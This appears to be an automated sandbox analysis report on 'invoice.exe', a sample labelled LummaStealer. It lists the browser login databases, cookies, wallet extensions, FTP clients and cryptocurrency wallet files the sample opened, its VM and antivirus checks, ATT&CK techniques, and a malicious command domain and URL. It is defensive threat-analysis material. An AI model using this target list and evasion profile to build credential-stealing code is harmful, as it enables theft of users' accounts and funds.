              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: invoice.exe, 00000000.00000002.1002704845.00000000003C4000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: *vmtoolsd.execuckoo_svc.exe
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: invoice.exe, 00000000.00000003.934196029.00000000032DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\invoice.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\invoice.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: invoice.exe, 00000000.00000003.906344999.000000000283D000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1002654387.0000000000369000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000000.00000000.883188851.0000000000369000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000000.00000002.1002704845.00000000003C4000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
              Source: invoice.exe, 00000000.00000002.1003104978.0000000000853000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979948724.0000000000823000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979895738.000000000084F000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000002.1003063314.0000000000826000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979670115.0000000000826000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\invoice.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 0.2.invoice.exe.2760000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.invoice.exe.27c0000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.invoice.exe.2760000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents (2 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT (8 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\EIVQSAOTAQ (9 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT (8 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\GRXZDKKVDB (9 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG (7 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI (9 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\NYMMPCEIMA (11 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH (8 times)
Source: C:\Users\user\Desktop\invoice.exe | Directory queried: C:\Users\user\Documents\VWDFPKGDUF (7 times)

              Remote Access Functionality

Source: Yara match | File source: 0.2.invoice.exe.2760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.invoice.exe.27c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.invoice.exe.2760000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the report's signature-count badges precede the technique names they belong to):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 12 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 21 Virtualization/Sandbox Evasion; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; Software Packing
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 321 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph (ID: 1654483; Sample: invoice.exe; Startdate: 02/04/2025; Architecture: WINDOWS; Score: 100)

• Domains / IPs contacted: ferroyxo.run; pki-goog.l.google.com; 2 other IPs or domains
• Top-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
• Process started: invoice.exe
• invoice.exe network: ferroyxo.run 172.67.131.170, 443, 49681, 49682, CLOUDFLARENETUS, United States
• invoice.exe signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; 2 other signatures
Antivirus detection for the submitted file:

Source | Detection | Scanner | Label
invoice.exe | 64% | Virustotal |
invoice.exe | 53% | ReversingLabs | Win32.Trojan.LummaStealer

No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection for URLs:

Source | Detection | Scanner | Label
https://ferroyxo.run/7g | 100% | Avira URL Cloud | malware
